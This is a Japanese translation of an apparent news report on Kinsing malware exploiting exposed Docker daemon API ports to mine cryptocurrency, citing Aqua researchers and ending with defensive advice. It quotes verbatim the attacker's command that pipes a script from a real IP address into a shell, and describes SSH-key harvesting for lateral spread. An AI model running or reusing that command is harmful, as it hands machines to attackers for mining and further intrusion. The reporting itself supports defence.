一部の Docker インストールは、他人の CPU 時間を使用してデジタル現金を採掘しようとするマルウェアの攻撃を受けています。
情報セキュリティ企業のAqua(バービーガールバンドではありません)によると、相当数のDockerデプロイメントが、デーモンAPIポートを保護なしにパブリックインターネットに公開しているという脆弱性を発見したとのことです。これは、過去にハッカーがデジタル通貨のマイニングに悪用した、かなり一般的な脆弱性です。しかし最近では、このインターフェース経由で毎日数千件もの感染攻撃が発生しており、その全てがKinsingと呼ばれるLinuxマルウェアによるものだと報じられています。
「これはここしばらくで見た中で最も多い数字であり、これまで目撃したものをはるかに超えている」と研究者のガル・シンガー氏は今週指摘した。
「したがって、これらの攻撃は、十分なリソースと、攻撃を実行し維持するために必要なインフラを備えた主体によって指揮されており、即興的な試みではないと我々は考えています。」
オープンシステムが見つかった場合、攻撃者は次のコマンドを実行するカスタム Ubuntu コンテナを作成して実行するように指示します。
/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null
取得したd.sh
スクリプトは、SELINUXのセキュリティ保護を無効化するとともに、感染マシン上で既に実行中のマルウェアや暗号通貨マイニングコンテナを検索して削除します。これにより、CPU時間の競合を回避できます。crontabを使用して毎分実行を継続するなど、様々な処理を行います。スクリプトの長さは600行にも及びます。
このスクリプトは、Kinsingマルウェア本体もダウンロードし、実行します。この悪質なソフトウェアは、感染したシステムで実行するための特別な命令を得るために、東ヨーロッパにある4つのコマンド&コントロールサーバーのいずれかに接続しようとします。また、spre.sh
発見したSSHキーを使用してログインし、他のマシンに拡散してコードを実行するスクリプト「」も実行します。
「マルウェアがダウンロードするspre.shシェルスクリプトは、コンテナネットワーク全体にマルウェアを横方向に拡散するために使用される」とAquaのシンガー氏は述べた。
潜在的なターゲットを発見し、認証に必要な情報を見つけるために、スクリプトは/.ssh/config、.bash_history、/.ssh/known_hostsなどから受動的にデータを収集します。追加のターゲットを特定するために使用されたアクティブなスキャン手法は確認されていません。
それが完了すると、マルウェアのマイニングコンポーネントが最終的に実行されます。
攻撃プロセスの図
(クリックして拡大)
The RegisterはDockerに攻撃に関するコメントを求めました。その間、Singer氏とAquaは、今回の感染拡大に関連するIPアドレスをブロックすることを推奨しています。また、デーモンAPIポートをインターネットに公開したままにしないこと、そしてポリシーと設定を用いてインターフェースとの通信を許可するシステムを制限することを強く推奨します。
「すべてのクラウドリソースを特定し、論理的な構造に基づいてグループ化してください」とチームは述べています。「認可・認証ポリシー、基本的なセキュリティポリシーを見直し、最小権限の原則に従って調整してください。主にユーザーアクションに関するログを調査し、異常を説明できないアクションを探してください。」®